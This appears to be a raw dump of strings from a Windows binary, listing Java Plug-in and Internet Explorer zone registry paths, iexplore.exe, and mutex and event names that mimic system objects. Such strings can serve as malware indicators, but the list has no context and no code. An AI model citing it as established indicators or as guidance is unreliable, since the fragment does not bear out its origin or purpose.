ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

iexplore.exe

HighMemoryEvent_x

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

MSCTF.Shared.MUTEX.x

.Prev

.Prev

.current

.current